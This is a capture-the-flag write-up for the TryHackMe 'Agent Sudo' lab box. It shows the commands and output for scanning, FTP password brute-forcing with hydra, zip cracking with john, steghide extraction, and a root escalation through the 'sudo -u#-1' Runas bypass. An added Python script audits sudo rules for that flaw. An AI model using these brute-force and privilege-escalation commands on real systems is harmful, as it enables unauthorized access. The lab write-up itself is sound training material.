Nmap
```
└─$ nmap -sC -sV -oA nmap/agentsudo 10.10.235.44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 15:57 EST
Nmap scan report for 10.10.235.44
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
We found no CVE from the Nmap scan.
The website gives a hint: it says to use your codename as the user-agent to access the site.
As the hint suggests, we have to use the agent name in the user-agent, so I opened Burp Suite and edited the user-agent to the name of the agent.

It says: "What are you doing! Are you one of the 25 employees? If not, I going to report this incident."
Now, instead of R, I tried different letters like A, B and so on. While testing C, we got the location /agent_C_attention.php.

So the name of the agent is chris.
Now, there is an FTP port open. So I tried to run ftp with default creds, but it didn't work, so we have to brute-force FTP using hydra.
```
└─$ hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.235.44 ftp
...
[21][ftp] host: 10.10.235.44 login: chris password: crystal
```
We found the password for chris's FTP server, which is crystal. Let's log in to FTP and see what is inside it.
```
└─$ ftp chris@10.10.235.44
Connected to 10.10.235.44.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||21299|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
```
I have downloaded the files using get <filename> from FTP. Let's see what is in the To_agentJ.txt file.
```
└─$ cat To_agentJ.txt
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C
```
So, from this we got the hint that there is some kind of file inside this image. So I used binwalk to get the data out of that image.
binwalk -e cutie.png → There is a zip file which contains a password. So using john we can crack the password for the zip file.
```
└─$ zip2john 8702.zip > hash.hash
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.hash
...
alien (8702.zip/To_agentR.txt)
```
So the password for the zip file is alien.
The zip file contains the following information.
```
└─$ cat To_agentR.txt
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
```
It seems like some kind of encoding, let's try base64.
```
└─$ echo QXJlYTUx | base64 -d
Area51
```
user flag
It seems Area51 is the password to decrypt data from the cute-alien.jpg file.
```
└─$ steghide --extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt".
┌──(kali㉿kali)-[~/Desktop/tryhackme/agentsudo]
└─$ cat message.txt
Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
```
The other agent's name is james and the SSH password for james is hackerrules!.
```
james@agent-sudo:~$ ls
Alien_autospy.jpg user_flag.txt
james@agent-sudo:~$ cat user_flag.txt
b03d975e8c92a7c04146cfa7a5a313c7
```
root flag
Download the file Alien_autospy.jpg using scp and reverse search it in Google.
```
└─$ sudo scp james@10.10.235.44:Alien_autospy.jpg .
```
Answer is - Roswell alien autopsy
Root exploit article - https://www.exploit-db.com/exploits/47502
```
james@agent-sudo:~$ sudo -l
Matching Defaults entries for james on agent-sudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash
james@agent-sudo:~$ sudo -u#-1 /bin/bash
root@agent-sudo:~# cat /root/root.txt
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
b53a02f55b57d4439e3341834d70c062
By,
DesKel a.k.a Agent R
```
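An added example, not part of the original writeup: a small Python audit that reads `sudo -l` output and flags Runas lists of the form "ALL except root", the rule shape that `sudo -u#-1` got past above. The sample input and the function names are constructed for illustration.

```python
import re

# Constructed input in the layout `sudo -l` prints; the "(ALL, !root)" line is
# the rule shown on this page, the other rules are made up for contrast.
SAMPLE_SUDO_L = """\
User james may run the following commands on agent-sudo:
    (root) /usr/bin/apt update
    (ALL, !root) /bin/bash
    (ALL : ALL) NOPASSWD: /usr/bin/less
    (www-data, !#0 : adm) /usr/bin/id
"""

RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(.+)$")
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, ...
ROOT_NAMES = {"root", "#0"}


def parse_rules(text):
    """Yield (runas_users, command) for every '(runas) command' line."""
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header or Defaults line, not a rule
        runas, rest = m.groups()
        users = runas.split(":", 1)[0]  # drop the optional ':group' part
        users = [u.replace(" ", "") for u in users.split(",") if u.strip()]
        yield users, TAG_RE.sub("", rest).strip()


def audit(text):
    """Return rules whose Runas list grants ALL and then excludes root."""
    findings = []
    for users, command in parse_rules(text):
        grants_all = "ALL" in users
        excludes_root = any(u[1:] in ROOT_NAMES for u in users if u.startswith("!"))
        if grants_all and excludes_root:
            findings.append({"runas": users, "command": command})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L):
        print("deny-list Runas:", ", ".join(f["runas"]), "->", f["command"])
```

Rules it reports are better rewritten as an explicit list of permitted target users, on an updated sudo, which is the box author's own tip.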